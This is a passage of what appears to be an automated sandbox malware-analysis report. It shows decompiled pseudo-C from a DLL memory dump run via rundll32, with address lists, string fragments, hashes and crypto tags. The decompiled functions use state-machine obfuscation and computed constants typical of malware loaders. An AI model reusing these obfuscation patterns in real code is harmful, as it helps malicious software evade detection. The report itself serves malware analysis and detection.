											L1:
											_t231 = 0xbbd3b0e;
											goto L2;
										}
									}
									goto L13;
								} else {
									if(_t270 != 0x2e937f96) {
										goto L19;
									} else {
										E10018C8B(_v60, _v64, _v84,  *_t269);
										_pop(_t247);
										L10:
										_t270 = 0x17e19405;
										while(1) {
											L1:
											_t231 = 0xbbd3b0e;
											goto L2;
										}
									}
								}
								L23:
								return _t236;
							}
							L13:
							_t248 = 0x24;
							_t236 = E100157E8(_t248);
							_t269 = _t236;
							_t247 = _t247;
							__eflags = _t269;
							if(__eflags != 0) {
								_t270 = 0x29623426;
								while(1) {
									L1:
									_t231 = 0xbbd3b0e;
									goto L2;
								}
							}
							goto L23;
						}
						_t247 = _v12;
						_t232 = E1000D6D8(_t247, _v16, _t247, E10008816, _v20, _t247, _t269, _t247, _t247, _v24, _v96);
						_t273 =  &(_t273[9]);
						 *((intOrPtr*)(_t269 + 4)) = _t232;
						__eflags = _t232;
						if(__eflags == 0) {
							_t270 = 0x2e937f96;
							_t231 = 0xbbd3b0e;
							goto L19;
						} else {
							_t270 = 0x25daab44;
							goto L1;
						}
						goto L23;
						L19:
						__eflags = _t270 - 0x32655ae2;
					} while (__eflags != 0);
					return _t231;
				}
			}

0x10003d4e
0x10003d51
0x10003d59
0x10003d65
0x10003d67
0x10003d6d
0x10003d6f
0x10003d74
0x10003d7a
0x10003d82
0x10003d87
0x10003d8f
0x10003d97
0x10003d9f
0x10003da7
0x10003daf
0x10003db7
0x10003dbf
0x10003dc4
0x10003dc9
0x10003dd1
0x10003dd9
0x10003de1
0x10003de6
0x10003dee
0x10003df6
0x10003dfe
0x10003e03
0x10003e07
0x10003e0f
0x10003e17
0x10003e1f
0x10003e27
0x10003e2c
0x10003e34
0x10003e3c
0x10003e44
0x10003e4c
0x10003e54
0x10003e59
0x10003e61
0x10003e6d
0x10003e70
0x10003e74
0x10003e7c
0x10003e84
0x10003e8c
0x10003e94
0x10003e9c
0x10003ea1
0x10003ea6
0x10003eae
0x10003eb6
0x10003ebe
0x10003ec6
0x10003ecb
0x10003ed0
0x10003ed8
0x10003ee0
0x10003ee8
0x10003ef0
0x10003ef8
0x10003efd
0x10003f05
0x10003f0d
0x10003f15
0x10003f1a
0x10003f22
0x10003f2a
0x10003f32
0x10003f3a
0x10003f44
0x10003f4c
0x10003f54
0x10003f5c
0x10003f64
0x10003f6c
0x10003f74
0x10003f7c
0x10003f84
0x10003f8c
0x10003f94
0x10003f99
0x10003f9e
0x10003fa6
0x10003fb5
0x10003fb6
0x10003fba
0x10003fc2
0x10003fca
0x10003fd2
0x10003fda
0x10003fe7
0x10003feb
0x10003ff3
0x10003ffb
0x10004003
0x1000400b
0x10004013
0x1000401b
0x10004020
0x10004028
0x1000402d
0x10004035
0x1000403d
0x10004042
0x1000404a
0x10004052
0x1000405a
0x10004068
0x1000406c
0x10004074
0x10004074
0x10004074
0x10004079
0x00000000
0x10004079
0x10004087
0x10004169
0x1000416d
0x10004172
0x10004175
0x10004178
0x1000417f
0x10004184
0x00000000
0x10004184
0x10004093
0x1000409f
0x00000000
0x10004213
0x100040ab
0x100041e4
0x100041e7
0x100041ec
0x100041ef
0x00000000
0x100041ef
0x100040b7
0x100040e1
0x100040ec
0x100040f1
0x100040f4
0x100040f5
0x100040f7
0x00000000
0x100040f9
0x1000410c
0x1000411f
0x10004123
0x10004128
0x1000412b
0x10004074
0x10004074
0x10004074
0x00000000
0x10004074
0x10004074
0x00000000
0x100040b9
0x100040bf
0x00000000
0x100040c5
0x100040d3
0x100040d9
0x100040da
0x100040da
0x10004074
0x10004074
0x10004074
0x00000000
0x10004074
0x10004074
0x100040bf
0x1000421d
0x1000421d
0x1000421d
0x10004135
0x10004140
0x10004141
0x10004146
0x10004148
0x10004149
0x1000414b
0x10004151
0x10004074
0x10004074
0x10004074
0x00000000
0x10004074
0x10004074
0x00000000
0x1000414b
0x100041ac
0x100041b3
0x100041b8
0x100041bb
0x100041be
0x100041c0
0x100041cc
0x100041d1
0x00000000
0x100041c2
0x100041c2
0x00000000
0x100041c2
0x00000000
0x100041d6
0x100041d6
0x100041d6
0x00000000
0x10004079

Strings

jp, xrefs: 10003E2C
., xrefs: 10003EAE
&4b), xrefs: 10004151
Gj, xrefs: 1000404A
]H, xrefs: 10003E74
EM, xrefs: 10003F05
Ze2, xrefs: 100041D6
&4b), xrefs: 100040B1

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &4b)$&4b)$.$EM$Gj$]H$jp$Ze2
API String ID: 0-3831357560
Opcode ID: fad2b6a6da34d5a79a599ec2a751447f4d4df015aa6644864e5b89069f857f56
Instruction ID: 8a5446e4f8035bc658c840a08d927aab7b0b9702947ac2468c43b6993038afce
Opcode Fuzzy Hash: fad2b6a6da34d5a79a599ec2a751447f4d4df015aa6644864e5b89069f857f56
Instruction Fuzzy Hash: 12C141B25083419BE354CF21C88944FBBE1FB94788F204A1DF595962A4E7B9D948CF87

Uniqueness

Uniqueness Score: -1.00%

Function 1000704B, Relevance: 10.2, Strings: 8, Instructions: 208
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E1000704B() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t185;
				void* _t186;
				signed int _t187;
				void* _t193;
				void* _t213;
				void* _t218;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				intOrPtr* _t226;
				signed int _t227;
				signed int* _t228;

				_t228 =  &_v68;
				_v60 = 0x1d43;
				_v60 = _v60 << 0xc;
				_t193 = 0x3977c092;
				_v60 = _v60 + 0x28c6;
				_v60 = _v60 ^ 0xdcba1064;
				_v60 = _v60 ^ 0xdd6f48a2;
				_v20 = 0xe9e;
				_v20 = _v20 | 0x1058ed95;
				_v20 = _v20 ^ 0x210197a0;
				_v20 = _v20 ^ 0x31590bf2;
				_v24 = 0x25e5;
				_v24 = _v24 >> 0xa;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x00002580;
				_v28 = 0x30bc;
				_v28 = _v28 | 0xe7a908b3;
				_v28 = _v28 * 0x23;
				_t218 = 0;
				_v28 = _v28 ^ 0xac22ac2a;
				_v56 = 0xe775;
				_v56 = _v56 >> 5;
				_v56 = _v56 + 0x1b94;
				_v56 = _v56 << 6;
				_v56 = _v56 ^ 0x0008bd00;
				_v32 = 0xff32;
				_v32 = _v32 >> 2;
				_v32 = _v32 | 0xd7112a41;
				_v32 = _v32 ^ 0xd7116591;
				_v64 = 0x688b;
				_v64 = _v64 + 0xadbd;
				_v64 = _v64 + 0x2af1;
				_v64 = _v64 + 0xffffcd5d;
				_v64 = _v64 ^ 0x00013bdf;
				_v68 = 0xd7fc;
				_v68 = _v68 | 0x40cef50a;
				_v68 = _v68 >> 2;
				_v68 = _v68 << 5;
				_v68 = _v68 ^ 0x0677a26b;
				_v4 = 0x4a94;
				_v4 = _v4 + 0xffffb7ad;
				_v4 = _v4 ^ 0x00004a42;
				_v8 = 0xf2c8;
				_t219 = 0x70;
				_v8 = _v8 / _t219;
				_v8 = _v8 ^ 0x000043de;
				_v36 = 0x586c;
				_t220 = 0x3c;
				_v36 = _v36 / _t220;
				_v36 = _v36 >> 7;
				_v36 = _v36 ^ 0x00005cc4;
				_v12 = 0x23ea;
				_v12 = _v12 + 0x3510;
				_v12 = _v12 ^ 0x00007e07;
				_v40 = 0xa101;
				_v40 = _v40 << 0xd;
				_v40 = _v40 + 0x4a49;
				_t221 = 0x14;
				_v40 = _v40 * 0xc;
				_v40 = _v40 ^ 0xf184ff7e;
				_v44 = 0xbfff;
				_v44 = _v44 | 0x69fcb387;
				_v44 = _v44 * 0x2d;
				_v44 = _v44 / _t221;
				_v44 = _v44 ^ 0x081251c3;
				_v48 = 0xf126;
				_t222 = 0x18;
				_v48 = _v48 / _t222;
				_v48 = _v48 << 1;
				_t223 = 0x4c;
				_t227 = _v4;
				_v48 = _v48 / _t223;
				_v48 = _v48 ^ 0x00005fbf;
				_t192 = _v4;
				_t224 = _v4;
				_v16 = 0x73ee;
				_v16 = _v16 << 0xc;
				_v16 = _v16 * 0x45;
				_v16 = _v16 ^ 0xf3f273d0;
				_v52 = 0x98da;
				_v52 = _v52 | 0x54ea2f47;
				_v52 = _v52 + 0xc0b4;
				_v52 = _v52 << 9;
				_v52 = _v52 ^ 0xd70e263f;
				while(1) {
					L1:
					_t213 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t193 != 0x1e3c7a) {
								if(_t193 == 0x1cae070b) {
									_t187 = E10017C1D(_v28, _v56, _t192, _t224, _v60, _v32);
									_t228 =  &(_t228[4]);
									_t227 = _t187;
									_t186 = 0x32ab8bb4;
									_t193 =  !=  ? 0x32ab8bb4 : 0x242cd2c8;
									_t213 = 0x5c;
									continue;
								} else {
									if(_t193 == 0x242cd2c8) {
										E1001F23C(_v40, _t192, _v44, _v48, _v16);
									} else {
										if(_t193 == _t186) {
											E10013C8B(_t227, _v64, _v68);
											_t218 =  !=  ? 1 : _t218;
											_t193 = 0x3667c679;
											while(1) {
												L1:
												_t213 = 0x5c;
												goto L2;
											}
										} else {
											if(_t193 == 0x336046fa) {
												_t226 =  *0x100221b0 + 0x10;
												while( *_t226 != _t213) {
													_t226 = _t226 + 2;
												}
												_t224 = _t226 + 2;
												_t193 = 0x1e3c7a;
												goto L2;
											} else {
												if(_t193 == 0x3667c679) {
													E1001F23C(_v4, _t227, _v8, _v36, _v12);
													_t228 =  &(_t228[3]);
													_t193 = 0x242cd2c8;
													while(1) {
														L1:
														_t213 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t193 != 0x3977c092) {
														goto L21;
													} else {
														_t193 = 0x336046fa;
														continue;
													}
												}
											}
										}
									}
								}
								L24:
								return _t218;
							}
							_t185 = E1000DA66(_v52, _t213, _v20, _t193, _v24);
							_t192 = _t185;
							_t228 =  &(_t228[3]);
							if(_t185 == 0) {
								_t193 = 0x2f5bcc41;
								_t186 = 0x32ab8bb4;
								_t213 = 0x5c;
								goto L21;
							} else {
								_t193 = 0x1cae070b;
								goto L1;
							}
							goto L24;
							L21:
						} while (_t193 != 0x2f5bcc41);
						goto L24;
					}
				}
			}

0x1000704b
0x1000704e
0x10007058
0x1000705d
0x10007062
0x1000706a
0x10007072
0x1000707a
0x10007082
0x1000708a
0x10007092
0x1000709a
0x100070a2
0x100070a7
0x100070ac
0x100070b4
0x100070bc
0x100070cd
0x100070d1
0x100070d3
0x100070db
0x100070e3
0x100070e8
0x100070f0
0x100070f5
0x100070fd
0x10007105
0x1000710a
0x10007112
0x1000711a
0x10007122
0x1000712a
0x10007132
0x1000713a
0x10007142
0x1000714a
0x10007152
0x10007157
0x1000715c
0x10007164
0x1000716c
0x10007174
0x1000717c
0x1000718a
0x1000718f
0x10007195
0x1000719d
0x100071a9
0x100071ae
0x100071b4
0x100071b9
0x100071c1
0x100071c9
0x100071d1
0x100071d9
0x100071e1
0x100071e6
0x100071f3
0x100071f4
0x100071f8
0x10007200
0x10007208
0x10007215
0x1000721f
0x10007225
0x1000722d
0x1000723b
0x10007240
0x10007246
0x1000724e
0x10007251
0x10007255
0x10007259
0x10007261
0x10007265
0x10007269
0x10007271
0x1000727b
0x1000727f
0x10007287
0x1000728f
0x10007297
0x1000729f
0x100072a4
0x100072ac
0x100072ac
0x100072ae
0x100072af
0x100072af
0x100072b4
0x00000000
0x100072b4
0x100072c6
0x10007374
0x10007379
0x1000737c
0x10007385
0x1000738a
0x1000738f
0x00000000
0x100072cc
0x100072d2
0x100073e7
0x100072d8
0x100072da
0x1000734a
0x10007355
0x10007358
0x100072ac
0x100072ac
0x100072ae
0x00000000
0x100072ae
0x100072dc
0x100072e2
0x10007326
0x1000732e
0x1000732b
0x1000732b
0x10007333
0x10007336
0x00000000
0x100072e4
0x100072ea
0x10007311
0x10007316
0x10007319
0x100072ac
0x100072ac
0x100072ae
0x100072af
0x00000000
0x100072af
0x100072ec
0x100072f2
0x00000000
0x100072f8
0x100072f8
0x00000000
0x100072f8
0x100072f2
0x100072ea
0x100072e2
0x100072da
0x100072d2
0x100073ef
0x100073f8
0x100073f8
0x100073a2
0x100073a7
0x100073a9
0x100073ae
0x100073bc
0x100073c1
0x100073c6
0x00000000
0x100073b0
0x100073b0
0x00000000
0x100073b0
0x00000000
0x100073c7
0x100073c7
0x00000000
0x100073d3
0x100072af

Strings

%, xrefs: 1000709A
lX, xrefs: 1000719D
u, xrefs: 100070DB
IJ, xrefs: 100071E6
#, xrefs: 100071C1
BJ, xrefs: 10007174
s, xrefs: 10007269
G/T, xrefs: 1000728F

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: BJ$G/T$IJ$lX$u$#$%$s
API String ID: 0-3663283382
Opcode ID: 68cc132da59532e028890120555b8f8cf8d3ca96860295649d235a9d2345430b
Instruction ID: 8abdfc3377e969d007f48d575ba9e8df293e221e8c990af46830db3dd983c89b
Opcode Fuzzy Hash: 68cc132da59532e028890120555b8f8cf8d3ca96860295649d235a9d2345430b
Instruction Fuzzy Hash: 849149719083419FE358CF21C58541FBBE1FBC4798F109A1DF98A962A0D7B9CA498F47

Uniqueness

Uniqueness Score: -1.00%

Function 100142E2, Relevance: 10.2, Strings: 8, Instructions: 177
COMMONCrypto

Download Yara Rule

C-Code - Quality: 69%

			E100142E2(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				unsigned int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				void* __ecx;
				void* _t140;
				signed int _t160;
				void* _t166;
				void* _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t188 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E100056B2(_t140);
				_v584 = 0x92ce;
				_t196 =  &(( &_v612)[5]);
				_v584 = _v584 >> 8;
				_v584 = _v584 >> 5;
				_t166 = 0x97b55c3;
				_v584 = _v584 ^ 0x000049ba;
				_v560 = 0xd753;
				_v560 = _v560 << 0xc;
				_v560 = _v560 ^ 0x0d754d3b;
				_v564 = 0x7345;
				_v564 = _v564 + 0xffffb630;
				_v564 = _v564 ^ 0x0000444d;
				_v580 = 0xc1d6;
				_t189 = 0xd;
				_v580 = _v580 * 0x72;
				_v580 = _v580 >> 0xa;
				_v580 = _v580 ^ 0x00004587;
				_v604 = 0xf114;
				_v604 = _v604 / _t189;
				_v604 = _v604 >> 0xd;
				_t190 = 0x7d;
				_v604 = _v604 * 0x2d;
				_v604 = _v604 ^ 0x00006087;
				_v596 = 0x254a;
				_v596 = _v596 >> 6;
				_v596 = _v596 + 0xffff3bab;
				_v596 = _v596 ^ 0x53fe3558;
				_v596 = _v596 ^ 0xac01675f;
				_v572 = 0x4b54;
				_v572 = _v572 | 0x16c6d02e;
				_v572 = _v572 ^ 0x16c6fd39;
				_v612 = 0xa42e;
				_v612 = _v612 / _t190;
				_v612 = _v612 + 0xffff9850;
				_t191 = 0x17;
				_v612 = _v612 / _t191;
				_v612 = _v612 ^ 0x0b214225;
				_v588 = 0x5e84;
				_t192 = 0x45;
				_v588 = _v588 / _t192;
				_v588 = _v588 + 0xffffd4b8;
				_v588 = _v588 ^ 0xffff9394;
				_v592 = 0x37c6;
				_v592 = _v592 ^ 0xfeb5582a;
				_v592 = _v592 + 0x4179;
				_v592 = _v592 * 0x75;
				_v592 = _v592 ^ 0x690a6987;
				_v576 = 0x500e;
				_v576 = _v576 + 0xffff7079;
				_v576 = _v576 ^ 0xffffa0e4;
				_v568 = 0xf903;
				_v568 = _v568 ^ 0x69a540ca;
				_v568 = _v568 ^ 0x69a5fd2e;
				_v600 = 0x246b;
				_v600 = _v600 >> 0xe;
				_t193 = _v576;
				_v600 = _v600 * 0x3e;
				_v600 = _v600 * 0x59;
				_v600 = _v600 ^ 0x00007c65;
				_v608 = 0x26e8;
				_v608 = _v608 * 0x78;
				_v608 = _v608 >> 9;
				_v608 = _v608 << 7;
				_v608 = _v608 ^ 0x00048f02;
				L1:
				while(_t166 != 0x6d2a7ea) {
					if(_t166 == 0x97b55c3) {
						_t166 = 0x10e2cb79;
						continue;
					}
					if(_t166 != 0x10e2cb79) {
						if(_t166 == 0x184d4ecd) {
							_t160 = E10011196(_v572, _t193, _v612,  &_v556, _v588);
							_t196 =  &(_t196[3]);
							goto L8;
						} else {
							if(_t166 == 0x2f406389) {
								return E100078F0(_t193, _v592, _v576, _v568, _v600);
							}
							if(_t166 != 0x34204f7e) {
								L16:
								if(_t166 != 0x27ada575) {
									continue;
								} else {
									return _t160;
								}
							} else {
								_v556 = 0x22c;
								_t160 = E1000C951(_v564, _t193, _v580, _v604,  &_v556, _v596);
								_t196 =  &(_t196[4]);
								L8:
								asm("sbb ecx, ecx");
								_t166 = ( ~_t160 & 0xd7924461) + 0x2f406389;
								continue;
							}
						}
						L19:
						return _t160;
					}
					_push(_t166);
					_push(_t166);
					_t160 = E100034DF(_v608);
					_t193 = _t160;
					if(_t160 != 0xffffffff) {
						_t166 = 0x34204f7e;
						continue;
					}
					goto L19;
				}
				_push(_t188);
				_push( &_v556);
				if(_a4() == 0) {
					_t166 = 0x2f406389;
					goto L16;
				} else {
					_t166 = 0x184d4ecd;
					goto L1;
				}
				goto L19;
			}

0x100142ec
0x100142f3
0x100142f5
0x100142fc
0x10014303
0x10014305
0x1001430a
0x10014312
0x10014315
0x1001431c
0x10014321
0x10014326
0x1001432e
0x10014336
0x1001433b
0x10014343
0x1001434b
0x10014353
0x1001435b
0x1001436a
0x1001436d
0x10014371
0x10014376
0x1001437e
0x1001438e
0x10014392
0x1001439c
0x1001439f
0x100143a3
0x100143ab
0x100143b3
0x100143b8
0x100143c0
0x100143c8
0x100143d0
0x100143d8
0x100143e0
0x100143e8
0x100143f8
0x100143fc
0x10014408
0x1001440d
0x10014413
0x1001441b
0x10014427
0x1001442a
0x1001442e
0x10014436
0x1001443e
0x10014446
0x1001444e
0x1001445b
0x1001445f
0x10014467
0x1001446f
0x10014477
0x1001447f
0x10014487
0x10014494
0x100144a1
0x100144a9
0x100144b3
0x100144b7
0x100144c0
0x100144c4
0x100144cc
0x100144d9
0x100144dd
0x100144e2
0x100144e7
0x00000000
0x100144ef
0x10014501
0x100145a1
0x00000000
0x100145a1
0x10014509
0x10014511
0x10014571
0x10014576
0x00000000
0x10014513
0x10014515
0x00000000
0x100145ea
0x10014521
0x100145c5
0x100145cb
0x00000000
0x00000000
0x00000000
0x00000000
0x10014527
0x1001452f
0x10014546
0x1001454b
0x1001454e
0x10014552
0x1001455a
0x00000000
0x1001455a
0x10014521
0x100145f7
0x100145f7
0x100145f7
0x10014587
0x10014588
0x10014589
0x1001458e
0x10014595
0x10014597
0x00000000
0x10014597
0x00000000
0x10014595
0x100145a8
0x100145ad
0x100145b7
0x100145c3
0x00000000
0x100145b9
0x100145b9
0x00000000
0x100145b9
0x00000000

Strings

yA, xrefs: 1001444E
TK, xrefs: 100143D0
~O 4, xrefs: 10014597
e|, xrefs: 100144C4
&, xrefs: 100144CC
~O 4, xrefs: 1001451B
MD, xrefs: 10014353
;Mu, xrefs: 1001433B

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ;Mu$MD$TK$e|$yA$~O 4$~O 4$&
API String ID: 0-3555957702
Opcode ID: 31af485f9c8a2b5b624dfb714d0d2516dbbc443f0cc9696091e90e43e2690cbc
Instruction ID: 7a5233acb4f0b7343e1caab6bffd9fb5e66aa78ce2eca496758581743dfb795c
Opcode Fuzzy Hash: 31af485f9c8a2b5b624dfb714d0d2516dbbc443f0cc9696091e90e43e2690cbc
Instruction Fuzzy Hash: 1E7166B15093029FD368CF22D94991FBBE1EBC4708F408A1DF5959A2A0D775CA49CF83

Uniqueness

Uniqueness Score: -1.00%

Function 10015AB8, Relevance: 10.2, Strings: 8, Instructions: 172
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E10015AB8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				void* _t155;
				void* _t175;
				signed int _t176;
				signed int _t177;
				signed int _t178;
				signed int _t179;
				void* _t182;
				intOrPtr* _t198;
				void* _t199;
				signed int* _t202;

				_push(_a16);
				_t198 = _a12;
				_push(_t198);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E100056B2(_t155);
				_v64 = 0xce72;
				_t202 =  &(( &_v68)[6]);
				_v64 = _v64 << 9;
				_t199 = 0;
				_t182 = 0xa327820;
				_t176 = 0x1c;
				_v64 = _v64 / _t176;
				_v64 = _v64 + 0xffff8abd;
				_v64 = _v64 ^ 0x000e49bc;
				_v8 = 0xd869;
				_v8 = _v8 + 0xb7;
				_v8 = _v8 ^ 0x0000d921;
				_v36 = 0xa5f6;
				_v36 = _v36 + 0xffff8ce6;
				_t177 = 0x14;
				_v36 = _v36 / _t177;
				_v36 = _v36 ^ 0x00004e2d;
				_v40 = 0xc3ca;
				_v40 = _v40 + 0x908a;
				_t178 = 0x63;
				_v40 = _v40 / _t178;
				_v40 = _v40 ^ 0x00006c32;
				_v44 = 0xe24;
				_v44 = _v44 << 7;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00f05026;
				_v24 = 0x7d7;
				_v24 = _v24 + 0xffffb711;
				_v24 = _v24 ^ 0xffffb7a2;
				_v48 = 0x8d07;
				_v48 = _v48 + 0xfffff854;
				_v48 = _v48 + 0xffffd8f0;
				_v48 = _v48 ^ 0x00001ba2;
				_v68 = 0x8813;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 + 0x19ce;
				_v68 = _v68 << 6;
				_v68 = _v68 ^ 0x0006522a;
				_v20 = 0x1e4f;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0x003cb9d6;
				_v60 = 0xca0;
				_v60 = _v60 * 0x63;
				_v60 = _v60 ^ 0x63869485;
				_v60 = _v60 << 3;
				_v60 = _v60 ^ 0x1c13f119;
				_v28 = 0xf08e;
				_v28 = _v28 + 0x10ed;
				_v28 = _v28 + 0xa702;
				_v28 = _v28 ^ 0x0001ca56;
				_v52 = 0x57f8;
				_v52 = _v52 << 0xc;
				_v52 = _v52 >> 0xa;
				_t179 = 0x4c;
				_v52 = _v52 / _t179;
				_v52 = _v52 ^ 0x00006698;
				_v32 = 0xdab;
				_v32 = _v32 << 0xc;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x56475ce6;
				_v12 = 0xaec1;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 ^ 0x0000705e;
				_v16 = 0x4e43;
				_v16 = _v16 * 0x64;
				_v16 = _v16 ^ 0x001eb931;
				_v56 = 0x98b0;
				_v56 = _v56 + 0xe89c;
				_v56 = _v56 + 0xb4ee;
				_v56 = _v56 + 0xffffbf3b;
				_v56 = _v56 ^ 0x0001c98f;
				while(_t182 != 0xa327820) {
					if(_t182 == 0x239384b6) {
						E100069FC( &_v4, _v28, _v52, _v32, _v8, _v12, _t182, _a8, _t199, _t182, _t182, _v16, _v56);
						 *_t198 = _v4;
					} else {
						if(_t182 == 0x352093e2) {
							_push(_t182);
							_t199 = E100157E8(_v4);
							if(_t199 != 0) {
								_t182 = 0x239384b6;
								continue;
							}
						} else {
							if(_t182 != 0x3a4d2a27) {
								L10:
								if(_t182 != 0x12c90a5a) {
									continue;
								} else {
								}
							} else {
								_t175 = E100069FC( &_v4, _v36, _v40, _v44, _v64, _v24, _t182, _a8, 0, _t182, _t182, _v48, _v68);
								_t202 =  &(_t202[0xb]);
								if(_t175 != 0) {
									_t182 = 0x352093e2;
									continue;
								}
							}
						}
					}
					return _t199;
				}
				_t182 = 0x3a4d2a27;
				goto L10;
			}

0x10015abf
0x10015ac3
0x10015ac7
0x10015ac8
0x10015acc
0x10015ad0
0x10015ad1
0x10015ad2
0x10015ad7
0x10015adf
0x10015ae2
0x10015aed
0x10015aef
0x10015af6
0x10015afb
0x10015b01
0x10015b09
0x10015b11
0x10015b19
0x10015b21
0x10015b29
0x10015b31
0x10015b3d
0x10015b42
0x10015b48
0x10015b50
0x10015b58
0x10015b64
0x10015b67
0x10015b6b
0x10015b73
0x10015b7b
0x10015b85
0x10015b89
0x10015b91
0x10015b99
0x10015ba1
0x10015ba9
0x10015bb1
0x10015bb9
0x10015bc1
0x10015bc9
0x10015bd1
0x10015bd6
0x10015bde
0x10015be3
0x10015beb
0x10015bf3
0x10015bf8
0x10015c00
0x10015c0d
0x10015c11
0x10015c19
0x10015c1e
0x10015c26
0x10015c2e
0x10015c36
0x10015c3e
0x10015c46
0x10015c4e
0x10015c53
0x10015c60
0x10015c6d
0x10015c71
0x10015c79
0x10015c81
0x10015c8b
0x10015c8f
0x10015c97
0x10015c9f
0x10015ca4
0x10015cac
0x10015cb9
0x10015cbd
0x10015cc5
0x10015ccd
0x10015cd5
0x10015cdd
0x10015ce5
0x10015ced
0x10015cf7
0x10015d92
0x10015d9e
0x10015cf9
0x10015cfb
0x10015d46
0x10015d50
0x10015d55
0x10015d57
0x00000000
0x10015d57
0x10015cfd
0x10015d03
0x10015d60
0x10015d66
0x00000000
0x00000000
0x10015d68
0x10015d05
0x10015d2e
0x10015d33
0x10015d38
0x10015d3a
0x00000000
0x10015d3a
0x10015d38
0x10015d03
0x10015cfb
0x10015da9
0x10015da9
0x10015d5b
0x00000000

Strings

\GV, xrefs: 10015C8F
x2, xrefs: 10015AEF
2l, xrefs: 10015B6B
^p, xrefs: 10015CA4
x2, xrefs: 10015CED
'*M:, xrefs: 10015D5B
CN, xrefs: 10015CAC
'*M:, xrefs: 10015CFD

Memory Dump Source

Source File: 00000006.00000002.2173093562.0000000010000000.00000040.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2173106861.0000000010021000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.2173110460.0000000010023000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: x2$ x2$'*M:$'*M:$2l$CN$^p$\GV
API String ID: 0-2340335227
Opcode ID: 56ecb1fefc8d69a2ba273b89fec3f9c42f7288201eef6b1703fe88df61fba167
Instruction ID: 479a953338cc6602b0d49e08dd5106ea6703caedab1e58faf33a3fe997809444
Opcode Fuzzy Hash: 56ecb1fefc8d69a2ba273b89fec3f9c42f7288201eef6b1703fe88df61fba167
Instruction Fuzzy Hash: C7710EB25093819FE354CF60C98991FBBE1FB98758F505A1CF2D54A2A0D3B6C949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1000421E, Relevance: 9.1, Strings: 7, Instructions: 309
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E1000421E() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				void* _t360;
				void* _t366;
				signed int _t408;
				signed int _t409;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t417;
				signed int* _t420;

				_t420 =  &_v1184;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t366 = 0x68d33d8;
				_v1056 = 0x2e288a;
				_v1052 = 0x75c5fe;
